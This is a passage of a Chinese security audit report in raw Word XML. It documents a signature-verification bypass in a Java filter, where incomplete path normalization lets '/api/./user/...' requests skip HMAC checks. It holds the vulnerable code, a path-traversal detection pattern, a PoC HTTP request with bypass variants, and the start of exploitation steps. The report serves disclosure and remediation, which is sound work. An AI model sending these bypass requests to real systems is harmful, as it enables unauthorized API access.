          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/./user/xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 原样返回；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺少 `containsPathTraversal()` 检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：未主动拒绝含 </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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等穿越特征的路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">上述缺陷导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shouldNotFilter()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的路径匹配逻辑被攻击者利用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者将目标路径（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）改写为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/./user/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1411"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>normalizePath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/./user/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无法匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SIGN_TEST_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（Ant 匹配要求路径以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 开头，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/./user/...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不满足）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1412"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shouldNotFilter()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，签名过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>doFilterInternal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被跳过；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1413"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">但 Tomcat 在 Servlet 路由阶段会标准化 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 片段，将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/./user/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路由到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的真实控制器；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter.getNormalizedPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>StringUtils.cleanPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，能正确解析得到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，仍施加 Token 鉴权（需有效用户 Token），但签名层已被完全绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">最终结果：持有合法用户 Token 的任意客户端（包括非授权第三方脚本、自动化机器人）可在不携带合法 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>appKey/appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 签名的情况下，调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SIGN_TEST_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 所覆盖的所有 API 端点，完全绕过客户端身份鉴权机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>调用链分析</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shouldNotFilter()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>normalizePath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 获得规范化路径，再与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SIGN_TEST_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 逐一匹配，决定当前请求是否需要进行签名校验。路径规范化不完整（缺少 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>cleanPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）→ 匹配结果错误（返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）→ 绕过整个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>doFilterInternal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 签名验证逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>❌ 存在漏洞的代码（含完整调用链关键片段）：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① 变更方法（漏洞根因）：SignAuthTestFilter.java</w:t>
              <w:br/>
              <w:t>private static String normalizePath(HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String path = URL_PATH_HELPER.getPathWithinApplication(request);  // ← 仅解码，不解析 "." 片段</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (path == null || path.isEmpty()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return "";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return path.replaceAll("/+", "/");  // ← 仅折叠连续斜杠，缺少 StringUtils.cleanPath() 调用</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 对比正确实现（SecurityConfig.getNormalizedPath）：</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // return StringUtils.cleanPath(path).replaceAll("/+", "/");  ← 正确写法，可消除 "." 片段</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞触发点：SignAuthTestFilter.java - shouldNotFilter()</w:t>
              <w:br/>
              <w:t>@Override</w:t>
              <w:br/>
              <w:t>protected boolean shouldNotFilter(HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!properties.isEnabled()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("OPTIONS".equalsIgnoreCase(request.getMethod())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String path = normalizePath(request);  // ← 入参 "/api/./user/profile" 经此方法后仍为 "/api/./user/profile"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("/test/sign/config".equals(path)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (String pattern : SIGN_TEST_PATTERNS) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (ANT_PATH_MATCHER.match(pattern, path)) {  // ← "/api/user/**" 无法匹配 "/api/./user/profile"</w:t>
              <w:br/>
              <w:t xml:space="preserve">            return false;  // ← 此分支不会执行</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return true;  // ← 攻击者触达此处：shouldNotFilter=true，签名校验被完全跳过</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 对比：SecurityConfig.java 中正确的实现（包含 cleanPath + containsPathTraversal）</w:t>
              <w:br/>
              <w:t>private static String getNormalizedPath(HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String path = URL_PATH_HELPER.getPathWithinApplication(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (path == null || path.isEmpty()) return "";</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    return StringUtils.cleanPath(p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ath).replaceAll("/+", "/");  // ← 正确：cleanPath 解析 "." 后再折叠斜杠</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>private static boolean containsPathTraversal(String s) {       // ← 正确：SecurityConfig 有此拦截</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (s == null) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String lower = s.toLowerCase();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return s.contains("..") || lower.contains("%2e%2e") || s.contains("..;")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            || s.contains(Constants.SYMBOL_SEMICOLON) || s.contains("..;/") || s.contains("/;/");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 注意：SignAuthTestFilter 无此检测</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 HTTP 请求包（POC）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>正常请求（需携带签名）：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/api/user/profile HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: target.example.com</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者持有的合法用户Token&gt;</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>X-Sign: &lt;HMAC签名&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>绕过签名的攻击请求（无需任何签名参数）：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HTTP</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GET /api/./user/profile HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: target.example.com</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Authorization: Bearer &lt;攻击者持有的合法用户Token&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>其他可用的绕过变体（所有 SIGN_TEST_PATTERNS 覆盖的端点均适用）：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/api/./game/xxx</w:t>
              <w:br/>
              <w:t>/api/./task/xxx</w:t>
              <w:br/>
              <w:t>/api/./prize/xxx</w:t>
              <w:br/>
              <w:t>/api/./ranking/xxx</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/api/./share/xxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">登录目标系统，取得合法 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Bearer Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
